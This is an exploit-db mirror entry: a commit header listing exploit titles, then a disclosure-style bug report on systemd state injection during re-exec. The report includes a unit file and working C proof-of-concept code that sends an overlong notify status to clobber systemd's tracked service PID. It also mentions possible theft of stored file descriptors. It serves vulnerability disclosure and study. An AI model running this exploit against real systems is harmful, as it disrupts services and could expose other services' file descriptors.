exploit-db-mirror/exploits/linux/dos/45714.c
Offensive Security 15b77b5965 DB: 2018-10-30
33 changes to exploits/shellcodes

Navicat 12.0.29 - 'SSH' Denial of Service (PoC)
AlienIP 2.41 - Denial of Service (PoC)
Local Server 1.0.9 - Denial of Service (PoC)
systemd - reexec State Injection
systemd - chown_one() can Dereference Symlinks
ASRock Drivers - Privilege Escalation
Modbus Slave 7.0.0 - Denial of Service (PoC)
School Equipment Monitoring System 1.0 - 'login' SQL Injection
Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)

Paramiko 2.4.1 - Authentication Bypass
Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection
Grapixel New Media 2 - 'pageref' SQL Injection
Library Management System 1.0 - 'frmListBooks' SQL Injection
Open Faculty Evaluation System 7 - 'batch_name' SQL Injection
Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)
MTGAS  MOGG Web Simulator Script - SQL Injection
Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery
Curriculum Evaluation System 1.0 - SQL Injection
Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection
Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection
School Event Management System 1.0 - SQL Injection
School Event Management System 1.0 - Arbitrary File Upload
School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin)
School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin)
School Attendance Monitoring System 1.0 - Arbitrary File Upload
School Attendance Monitoring System 1.0 - SQL Injection
PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection
RhinOS CMS 3.x - Arbitrary File Download
E-Negosyo System 1.0 - SQL Injection
SaltOS Erp Crm 3.1 r8126 - SQL Injection
SaltOS Erp Crm 3.1 r8126 - SQL Injection (2)
SaltOS Erp Crm 3.1 r8126 - Database File Download
K-iwi Framework 1775 - SQL Injection
2018-10-30 05:01:46 +00:00

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C

/*
[I am sending this bug report to Ubuntu, even though it's an upstream
bug, as requested at
https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports
.]
When systemd re-executes (e.g. during a package upgrade), state is
serialized into a memfd before the execve(), then reloaded after the
execve(). Serialized data is stored as text, with key-value pairs
separated by newlines. Values are escaped to prevent control character
injection.
Lines associated with a systemd unit are read in unit_deserialize()
using fgets():
char line[LINE_MAX], *l, *v;
[...]
if (!fgets(line, sizeof(line), f)) {
if (feof(f))
return 0;
return -errno;
}
LINE_MAX is 2048:
/usr/include/bits/posix2_lim.h:#define LINE_MAX _POSIX2_LINE_MAX
/usr/include/bits/posix2_lim.h:#define _POSIX2_LINE_MAX 2048
When fgets() encounters overlong input, it behaves dangerously. If a
line is more than 2047 characters long, fgets() will return the first
2047 characters and leave the read cursor in the middle of the
overlong line. Then, when fgets() is called the next time, it
continues to read data from offset 2047 in the line as if a new line
started there. Therefore, if an attacker can inject an overlong value
into the serialized state somehow, it is possible to inject extra
key-value pairs into the serialized state.
A service that has `NotifyAccess != none` can send a status message to
systemd that will be stored as a property of the service. When systemd
re-executes, this status message is stored under the key
"status-text".
Status messages that are sent to systemd are received by
manager_dispatch_notify_fd(). This function has a receive buffer of
size NOTIFY_BUFFER_MAX==PIPE_BUF==4096.
Therefore, a service with `NotifyAccess != none` can trigger this bug.
Reproducer:
Create a simple service with NotifyAccess by copying the following
text into /etc/systemd/system/notify_test.service (assuming that your
home directory is /home/user):
=========
[Unit]
Description=jannh test service for systemd notifications
[Service]
Type=simple
NotifyAccess=all
FileDescriptorStoreMax=100
User=user
ExecStart=/home/user/test_service
Restart=always
[Install]
WantedBy=multi-user.target
=========
Create a small binary that sends an overlong status when it starts up:
=========
*/
user@ubuntu-18-04-vm:~$ cat test_service.c
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <err.h>
#include <signal.h>
#include <stdio.h>
int main(void) {
int sock = socket(AF_UNIX, SOCK_DGRAM, 0);
if (sock == -1) err(1, "socket");
struct sockaddr_un addr = {
.sun_family = AF_UNIX,
.sun_path = "/run/systemd/notify"
};
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))) err(1, "connect");
char message[0x2000] = "STATUS=";
memset(message+7, 'X', 2048-1-12);
strcat(message, "main-pid=13371337");
struct iovec iov = {
.iov_base = message,
.iov_len = strlen(message)
};
union {
struct cmsghdr cmsghdr;
char buf[CMSG_SPACE(sizeof(struct ucred))];
} control = { .cmsghdr = {
.cmsg_level = SOL_SOCKET,
.cmsg_type = SCM_CREDENTIALS,
.cmsg_len = CMSG_LEN(sizeof(struct ucred))
}};
struct ucred *ucred = (void*)(control.buf + CMSG_ALIGN(sizeof(struct cmsghdr)));
ucred->pid = getpid();
ucred->uid = getuid();
ucred->gid = getgid();
struct msghdr msghdr = {
.msg_iov = &iov,
.msg_iovlen = 1,
.msg_control = &control,
.msg_controllen = sizeof(control)
};
if (sendmsg(sock, &msghdr, 0) != strlen(message)) err(1, "sendmsg");
while (1) pause();
}
/*
user@ubuntu-18-04-vm:~$ gcc -o test_service test_service.c
user@ubuntu-18-04-vm:~$
=========
Install the service, and start it. Then run strace against systemd,
and run:
=========
root@ubuntu-18-04-vm:~# systemctl daemon-reexec
root@ubuntu-18-04-vm:~# systemctl stop notify_test.service
=========
The "stop" command hangs, and you'll see the following in strace:
=========
root@ubuntu-18-04-vm:~# strace -p1 2>&1 | grep 13371337
openat(AT_FDCWD, "/proc/13371337/stat", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
kill(13371337, SIG_0) = -1 ESRCH (No such process)
kill(13371337, SIGTERM) = -1 ESRCH (No such process)
=========
This demonstrates that systemd's representation of the service's PID
was clobbered by the status message.
This can in theory, depending on how the active services are
configured and some other things, also be used to e.g. steal file
descriptors that other services have stored in systemd (visible in
the serialized representation as "fd-store-fd").
This isn't the only place in systemd that uses fgets(); other uses of
fgets() should probably also be audited and potentially replaced with
a safer function.
*/